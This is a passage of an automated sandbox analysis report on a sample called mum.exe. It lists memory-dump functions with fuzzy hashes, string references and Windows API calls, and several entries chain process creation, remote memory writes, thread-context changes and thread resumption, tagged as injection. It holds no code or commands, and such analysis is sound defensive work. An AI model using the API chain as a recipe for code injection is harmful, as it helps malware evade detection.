Instruction Fuzzy Hash: CFA1AB74A05228DFDB64DF24C894BEAB7B2BB4A304F1085EAD50EA7350DB719E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E3489 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2d9f1a2ef74d17583baf31c14cf2b3a15987b2037e8581617cf71339c75e57e
Instruction ID: 3dd3fb4a05e64b48188a7356530c051dc85d2865b8ea1f849b8a106d5eb13a36
Opcode Fuzzy Hash: c2d9f1a2ef74d17583baf31c14cf2b3a15987b2037e8581617cf71339c75e57e
Instruction Fuzzy Hash: 6251C774E00648CFDB08DFAAD48499DFBF2BF89304F249169D809AB365EB309945CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002C2359 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bf9d226f561faacaeeb826a339f61db046cb2ee9782a273f4a0f0886b477903
Instruction ID: 21f021182058fa152f26a17e59ba0043036ff6624b612b71b109e469239144be
Opcode Fuzzy Hash: 1bf9d226f561faacaeeb826a339f61db046cb2ee9782a273f4a0f0886b477903
Instruction Fuzzy Hash: DD51BF34A05228DFCB65DF24D894BAEB7B2BF4A304F5095EAD40AA7350CB719E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E37AE Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 650cfe9a2d5a6d16ec0db1dd82314afda288a5b48cdb6255de0cbd4e38361907
Instruction ID: 7ecbf6923fcad114f0ab133ad43c0b180b8ca3e2e3427eee24b152656df3b841
Opcode Fuzzy Hash: 650cfe9a2d5a6d16ec0db1dd82314afda288a5b48cdb6255de0cbd4e38361907
Instruction Fuzzy Hash: EAD09E78E1429CCBCF10DF65D8547ADB375BF46225F0075A6C10DA3A50D7305E509A16

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mum.exePID: 2520, Parent PID: 1672COMMON

Execution Graph

Execution Coverage:	12.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	26
Total number of Limit Nodes:	0

Executed Functions

Function 00272840 Relevance: 4.3, Strings: 3, Instructions: 525
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

=, xrefs: 00272ADA
+, xrefs: 00272D52
+, xrefs: 00272A4A

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID: +$+$=
API String ID: 0-3271284183
Opcode ID: 732dc28d4b53699a44e1db21d3259fc18b760bd3d9961767dd0813990814a613
Instruction ID: 193df516416d4f896f91269c5ec99233f60d423ea4c2bfb757ca8f64338f9a10
Opcode Fuzzy Hash: 732dc28d4b53699a44e1db21d3259fc18b760bd3d9961767dd0813990814a613
Instruction Fuzzy Hash: 9A228F30610614CFC754EF78C491A9EB7B2AF8A304F1584BDD90A9F369DB39AC46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00276E30 Relevance: 4.1, Strings: 3, Instructions: 393
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`!l, xrefs: 002773EB
,/l, xrefs: 00277193
`!l, xrefs: 002773FB

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID: ,/l$`!l$`!l
API String ID: 0-3429197752
Opcode ID: 5455166a1d2f248c078d6cf65c1914ae5a25a1f60b83c5a412714cea98958b63
Instruction ID: abd24c219614d6635a77d309fbce537b2128c50a2ebd0e5acea8517a2200b966
Opcode Fuzzy Hash: 5455166a1d2f248c078d6cf65c1914ae5a25a1f60b83c5a412714cea98958b63
Instruction Fuzzy Hash: 8FE1F170A2C655CFC7018F78C9556BABBB1FF45300F18C56BE4A99B292C374D861CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0027091A Relevance: 2.9, Strings: 2, Instructions: 358
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

48l, xrefs: 0027093E
(Fl, xrefs: 00270B65

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID: (Fl$48l
API String ID: 0-2888918871
Opcode ID: 807b37d98d3bc0565873ee0c29ace45144593259a248b47aa8fe791e52d65c3c
Instruction ID: 65c610728e61c00249036987dcc766616a38d1b8fd2e818f15c7b9beed7eed98
Opcode Fuzzy Hash: 807b37d98d3bc0565873ee0c29ace45144593259a248b47aa8fe791e52d65c3c
Instruction Fuzzy Hash: 82E18C35A10229CFDB14DF79D884AAEB7B2BF88305F11C529E405EB764DB34AD458F90

Uniqueness

Uniqueness Score: -1.00%

Function 00271CA2 Relevance: 2.7, Strings: 2, Instructions: 183
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00271DCE
.*=, xrefs: 00271D5C

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID: $.*=
API String ID: 0-954985398
Opcode ID: 8572d88f4142e0906dfdac2a01852d12e0ba82142327ce5dc8749d78e60d745f
Instruction ID: 52e5b844beee8af187df6d85a5bab3bc07ef0d424b17112e719c97bc4b09647b
Opcode Fuzzy Hash: 8572d88f4142e0906dfdac2a01852d12e0ba82142327ce5dc8749d78e60d745f
Instruction Fuzzy Hash: AF51C071B101098FCB14CB7DD8845AEBBB2EFC9315725817AD909D7755EB30EC618B90

Uniqueness

Uniqueness Score: -1.00%

Function 002762A7 Relevance: 1.5, Strings: 1, Instructions: 248COMMON

Download Yara Rule

Strings

48l, xrefs: 00276251

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID: 48l
API String ID: 0-3926459034
Opcode ID: fa436ce603c14b3323cb1def335a6e18e99dc89ad32e09602b2edb0643ed5fdb
Instruction ID: d8d37ea26939c2ec9873a3f81457f3079d0836527973c27666648e963f0c0389
Opcode Fuzzy Hash: fa436ce603c14b3323cb1def335a6e18e99dc89ad32e09602b2edb0643ed5fdb
Instruction Fuzzy Hash: F2910631A29A11CFCB208FA8D9592AAB7B1FF45301F24C47BD96ED7282D3748C64C715

Uniqueness

Uniqueness Score: -1.00%

Function 00271990 Relevance: 1.5, Strings: 1, Instructions: 235COMMON

Download Yara Rule

Strings

tl, xrefs: 00271A0D

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID: tl
API String ID: 0-379094156
Opcode ID: 0942ea02259a44dc1aee8592a4939fca22e06947d04120a441238972b34e970f
Instruction ID: 67694c3f3e25fdc21ffd818a7af28194a7704fbc1a9c4429dd8facc626fd501c
Opcode Fuzzy Hash: 0942ea02259a44dc1aee8592a4939fca22e06947d04120a441238972b34e970f
Instruction Fuzzy Hash: 22816C32B205159FD714DB69D880A9EB3E3AFC8724F1AC065E809DB765DB35DC11CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00270588 Relevance: 1.5, Strings: 1, Instructions: 204COMMON

Download Yara Rule

Strings

(Fl, xrefs: 00270701

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID: (Fl
API String ID: 0-3640630996
Opcode ID: f00350d54e273ef4fa0cabf3e3229ecc9536655d8b3dd626aadfd8eb3b590a3f
Instruction ID: f650161c4cc1f9318ac5d2c129e99783f155e0081730c73f4e650bac7b5b78ef
Opcode Fuzzy Hash: f00350d54e273ef4fa0cabf3e3229ecc9536655d8b3dd626aadfd8eb3b590a3f
Instruction Fuzzy Hash: 457119B8D5020EDFDF14CFAAD4859ADBBB1BF48300F20A659D416EB290DB31A955CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00271A31 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fbeb0c5145ed1076791e3d12e8450e5e41b54a19bc244ce666e48c686711c3b
Instruction ID: bedd1694e959dff0de0135cc5a6f771ec3e17d225f5ef792bbd5ba7bf7f0def4
Opcode Fuzzy Hash: 0fbeb0c5145ed1076791e3d12e8450e5e41b54a19bc244ce666e48c686711c3b
Instruction Fuzzy Hash: 17615C32F205259FD714DB69C880B9EB3E3AFC8714F2AC165E8199B765DA34DC11CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00273699 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4adcaacc1353d8f75068065daaecfb66dcfcbbbb9d58d56dfc9948f9c9e4a6cc
Instruction ID: f5f745bd1f36c0a5c0cc58164d5be4dac8baf686161af10ea99a83a63fad5429
Opcode Fuzzy Hash: 4adcaacc1353d8f75068065daaecfb66dcfcbbbb9d58d56dfc9948f9c9e4a6cc
Instruction Fuzzy Hash: D721C7B1E046588BDB18CFABC81059EFBF7AFC9300F18C07A8458AB269DB705902CF41

Uniqueness

Uniqueness Score: -1.00%

Function 00272938 Relevance: 4.2, Strings: 3, Instructions: 426
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

=, xrefs: 00272ADA
+, xrefs: 00272D52
+, xrefs: 00272A4A

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID: +$+$=
API String ID: 0-3271284183
Opcode ID: 12bbb915eb2d013cbceab3a1c1278b87671ba68bbaddb2d8b30e93b5fc4b2160
Instruction ID: 4009a5bb1fa35ae152589c4284e61dfe908285dfd206191b15494c3fad24ac04
Opcode Fuzzy Hash: 12bbb915eb2d013cbceab3a1c1278b87671ba68bbaddb2d8b30e93b5fc4b2160
Instruction Fuzzy Hash: 96023E34610614CFCB54EF78C495A9EB7A6AF89304F1184BCD80AAF369DF39AC45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00270114 Relevance: 4.2, Strings: 3, Instructions: 424
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

=, xrefs: 00272ADA
+, xrefs: 00272D52
+, xrefs: 00272A4A

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID: +$+$=
API String ID: 0-3271284183
Opcode ID: dee244ccda83d9057b225417520dc95b84a0f815e96a0942a9a3b74419080d9c
Instruction ID: 466e9d88e14b457e8f876f4256c26f0f5f65711e3c8c2165f4cf4a1d9ac774d5
Opcode Fuzzy Hash: dee244ccda83d9057b225417520dc95b84a0f815e96a0942a9a3b74419080d9c
Instruction Fuzzy Hash: 03023F34610614CFCB54EF78C495A9EB7A6AF89304F1184BCD80AAF369DF39AC45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00272F60 Relevance: 2.6, Strings: 2, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`!l, xrefs: 002730B0
`!l, xrefs: 002730A4

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID: `!l$`!l
API String ID: 0-3986300676
Opcode ID: f8a939342b5105921535a911a270b5145b3a2e0b41efc835c76a8dab88f2469b
Instruction ID: ce3573d638cb73103e6cb245bd297b3464a4a5025a2957da2d154d55da7b1b8a
Opcode Fuzzy Hash: f8a939342b5105921535a911a270b5145b3a2e0b41efc835c76a8dab88f2469b
Instruction Fuzzy Hash: 2241CC347001148FC744EF78D855A6E7BF2AF8A300B2580A9E51ADB7A6DE30DC158BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00271750 Relevance: 2.6, Strings: 2, Instructions: 136
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

.*=, xrefs: 002717CF
, xrefs: 00271862

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID: $.*=
API String ID: 0-954985398
Opcode ID: d0b8b8732eb2a7a9cf59730bc3fbe1ebaa9f27e1f1265aa8dce0e1ad2c34b10c
Instruction ID: cdcc2b8e9ce38351cf3df7745bd5dccc0670dfc7417ee2ba3eada27a4be576c5
Opcode Fuzzy Hash: d0b8b8732eb2a7a9cf59730bc3fbe1ebaa9f27e1f1265aa8dce0e1ad2c34b10c
Instruction Fuzzy Hash: FB418A71F1011A8BDB10DF99E8846AEBBBAFF84311B15C52AE518D7645D330E8618B91

Uniqueness

Uniqueness Score: -1.00%

Function 00275E48 Relevance: 2.6, Strings: 2, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

48l, xrefs: 00275E8A
48l, xrefs: 00275F8E

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID: 48l$48l
API String ID: 0-1341598364
Opcode ID: 1d324bffb7c5c22f94d68a2ec9990d9b0abfaef8d36745cba85edefdcde568a7
Instruction ID: 035b728fe19962acdf76effbd19903a8e9e3c3da352760112dfea1f7adbea68d
Opcode Fuzzy Hash: 1d324bffb7c5c22f94d68a2ec9990d9b0abfaef8d36745cba85edefdcde568a7
Instruction Fuzzy Hash: 0841D230A25626CFCB108FA8C84567EF6B5FB45750F64842AE10ADB690DBF49D208B92

Uniqueness

Uniqueness Score: -1.00%

Function 00276008 Relevance: 2.6, Strings: 2, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

48l, xrefs: 0027625D
48l, xrefs: 00276251

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID: 48l$48l
API String ID: 0-1341598364
Opcode ID: 1e03b1273c0e8fddbe6a9f8cd5ff83264cd79508489628611fcd592fb25fa315
Instruction ID: 9cb77a7367c1745f3e96fe343bce106601d623dee9c854060039c747b3f45bc9
Opcode Fuzzy Hash: 1e03b1273c0e8fddbe6a9f8cd5ff83264cd79508489628611fcd592fb25fa315
Instruction Fuzzy Hash: FE416B34925A16CBC7209FA8C8086BABBF1FF44315F58C167E42DD72A6D3B4D960C751

Uniqueness

Uniqueness Score: -1.00%

Function 00F07270 Relevance: 1.8, APIs: 1, Instructions: 323
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00F07537

Memory Dump Source

Source File: 00000013.00000002.992812403.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_f00000_mum.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 4d3c98030227b093a0f7a5a3f6066f2c3eb2066a8b3d3f7bb4a5c2626e7b83fd
Instruction ID: 1119b9debb64f94215d6e84636a1859e07b46191b1c3eff210b7824e2031127d
Opcode Fuzzy Hash: 4d3c98030227b093a0f7a5a3f6066f2c3eb2066a8b3d3f7bb4a5c2626e7b83fd
Instruction Fuzzy Hash: 58C13770D0421D8FDF24DFA4C841BEDBBB1BB49314F0095A9E919B7280DB70AA85EF95

Uniqueness

Uniqueness Score: -1.00%

Function 00274051 Relevance: 1.8, Strings: 1, Instructions: 530
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

~, xrefs: 002741F9

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: 379644157c08e3d11780122bd1225624ca88a5a4851a210dc1d8175c87a1ab73
Instruction ID: 163508e63ba6108589b3ae9dee10d8bfa58f4d259658da127dd8967f314184e1
Opcode Fuzzy Hash: 379644157c08e3d11780122bd1225624ca88a5a4851a210dc1d8175c87a1ab73
Instruction Fuzzy Hash: 7B42CD75A10218DFCB15DF98C980E99BBB2FF49314F1581E5EA09AB222C731EDA1DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00F06E48 Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00F06F1B

Memory Dump Source

Source File: 00000013.00000002.992812403.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_f00000_mum.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 86de0e92c73429ca1e7f545fd9b44e57006ec57fcefa2e66b51638ffef651c5f
Instruction ID: c84a07d879d49f21ace8cb3b4868a6be242e9506c420e68881c11189292f1c84
Opcode Fuzzy Hash: 86de0e92c73429ca1e7f545fd9b44e57006ec57fcefa2e66b51638ffef651c5f
Instruction Fuzzy Hash: 0C41B8B4D002189FCF00CFA9D984AEEBBB1BF49314F20942AE814BB240D734AA55CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00F06FD0 Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00F0708A

Memory Dump Source

Source File: 00000013.00000002.992812403.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_f00000_mum.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 0bf9293737dc35fd85bea80e59ef7adaf2c1f451f591f992ac7c758417f1a794
Instruction ID: baee3e86dbaaaa0ed15308b7b9a38387e26da462479b17a0650284cffbee1ab4
Opcode Fuzzy Hash: 0bf9293737dc35fd85bea80e59ef7adaf2c1f451f591f992ac7c758417f1a794
Instruction Fuzzy Hash: F341C8B5D042589FCF10CFA9D884AEEFBB1BF49310F10942AE815B7240D775A916CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00F06FD8 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00F0708A

Memory Dump Source

Source File: 00000013.00000002.992812403.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_f00000_mum.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: f112933abd9b4ec42418d5897807f548082ed96f4bdb661dec1f80f81a51df27
Instruction ID: 769d19b7666c86ecbed25c16686fa59a85726d2830121904b716f6c1b8fb20ac
Opcode Fuzzy Hash: f112933abd9b4ec42418d5897807f548082ed96f4bdb661dec1f80f81a51df27
Instruction Fuzzy Hash: ED41A7B5D042589FCF10CFA9D884AEEFBB1BF49310F10A42AE814B7240D735A955CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00F06CF0 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00F06D9A

Memory Dump Source

Source File: 00000013.00000002.992812403.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_f00000_mum.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a2d3009157de856179a7b04979d844557db36f8544ada1e9db1284b11c3252aa
Instruction ID: e457a25f784fd6e103a02b68dd7f5be6a52ec11fe48204956df1d908f3723d6b
Opcode Fuzzy Hash: a2d3009157de856179a7b04979d844557db36f8544ada1e9db1284b11c3252aa
Instruction Fuzzy Hash: 764199B8D042589FCF10CFA9D884ADEBBB1FF49310F10942AE914B7240D735A915CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00F06AF9 Relevance: 1.6, APIs: 1, Instructions: 99threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 00F06BAF

Memory Dump Source

Source File: 00000013.00000002.992812403.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_f00000_mum.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 6e15ac2407ee5bd07d84effa1222428015ff01a123a60fbee42a244643760431
Instruction ID: a2ee9e2ee3d7efb6e70a8d3112538de42c3209fc48fe2381f9b0d2ace50f680d
Opcode Fuzzy Hash: 6e15ac2407ee5bd07d84effa1222428015ff01a123a60fbee42a244643760431
Instruction Fuzzy Hash: EA41DCB4D042589FCF10CFA9D884AEEBBB1FF49314F24842AE815B7240D778A955CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00F06B00 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 00F06BAF

Memory Dump Source

Source File: 00000013.00000002.992812403.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_f00000_mum.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 2d09efe9762f3f20f50360065428fc50b644a14c03d3cdd6806d1b86055dba51
Instruction ID: b221a6a8066f6c0ecd274c3c8d49d68be499dba44506c149f5dcd3491f255719
Opcode Fuzzy Hash: 2d09efe9762f3f20f50360065428fc50b644a14c03d3cdd6806d1b86055dba51
Instruction Fuzzy Hash: E641ACB4D002589FCB14CFA9D884AEEFBB1FF49314F24842AE414B7240D779A955CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00F069D8 Relevance: 1.6, APIs: 1, Instructions: 80threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 00F06A5E

Memory Dump Source

Source File: 00000013.00000002.992812403.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_f00000_mum.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: fae52bf60b7d093577f054fd17038688315bc11e2974c2d5453d0113142edca7
Instruction ID: eec314f3bbe2f32b41ac837ebdceb7b2cf72342aaa1a111742efc24ccecfc143
Opcode Fuzzy Hash: fae52bf60b7d093577f054fd17038688315bc11e2974c2d5453d0113142edca7
Instruction Fuzzy Hash: DD31CCB5D012189FCF14DFA9E884ADEFBB5EF49314F10941AE815B7240D735A912CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00F069E0 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 00F06A5E

Memory Dump Source

Source File: 00000013.00000002.992812403.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_f00000_mum.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 81b0e08d5cf999ed7f86178e767725b2e6e63ba5417fe2cbf37729f6192e5737
Instruction ID: fae517eb55dc3112470d42807752445efe310324d0e203f94315d420cf0e72b3
Opcode Fuzzy Hash: 81b0e08d5cf999ed7f86178e767725b2e6e63ba5417fe2cbf37729f6192e5737
Instruction Fuzzy Hash: DD31BAB4D002189FCF14DFA9D884A9EFBB5EF49314F10942AE815B7340D735A901CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00270577 Relevance: 1.4, Strings: 1, Instructions: 144COMMON

Download Yara Rule

Strings

(Fl, xrefs: 00270701

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID: (Fl
API String ID: 0-3640630996
Opcode ID: f1084ccb8a1574de7f2e8117c0e1de3cd09438f0252ce958ccf3ffd4099bb774
Instruction ID: 116c3e0f4ded1ec1ef7891ae31e027a2c7ed447bca1329b48ff1b56c1df4a29f
Opcode Fuzzy Hash: f1084ccb8a1574de7f2e8117c0e1de3cd09438f0252ce958ccf3ffd4099bb774
Instruction Fuzzy Hash: A15149B8D0021ADFDF00CFA9D891AEEBBB1BF89300F10A569D415EB250DB30A955CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00275E46 Relevance: 1.4, Strings: 1, Instructions: 104COMMON

Download Yara Rule

Strings

48l, xrefs: 00275E8A

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID: 48l
API String ID: 0-3926459034
Opcode ID: 8f513d2aadba8952ee19c8ecd008d5d053638f6d775b7db08d5c81511387d9ea
Instruction ID: 1506c3784dea52d09885f2bd47c41fb283a836ff0106158cff58f9ac25b9e6f2
Opcode Fuzzy Hash: 8f513d2aadba8952ee19c8ecd008d5d053638f6d775b7db08d5c81511387d9ea
Instruction Fuzzy Hash: 8F31F630A21A26CFCB108FA8C84567EF7F5FB45340F54843AE00AE7691DBF49960CB52

Uniqueness

Uniqueness Score: -1.00%

Function 05356568 Relevance: 1.3, Strings: 1, Instructions: 84COMMON

Download Yara Rule

Strings

`!l, xrefs: 053565AB

Memory Dump Source

Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5350000_mum.jbxd

Similarity

API ID:
String ID: `!l
API String ID: 0-283557256
Opcode ID: 18dc0192a19ba23b1576e7c777c24eef9bb56e8ff23e7a4ce471130108471298
Instruction ID: 359564090bd0914dc4e171cebbc219c2f764a26f0f76ad9e9cee528ec4a56fcb
Opcode Fuzzy Hash: 18dc0192a19ba23b1576e7c777c24eef9bb56e8ff23e7a4ce471130108471298
Instruction Fuzzy Hash: 8D312674E0021C9FCB09DFA9D8515EEBBB2FF88300F14802AE515A73A1EB355906CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05356B58 Relevance: 1.3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

B-z, xrefs: 05356C16

Memory Dump Source

Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

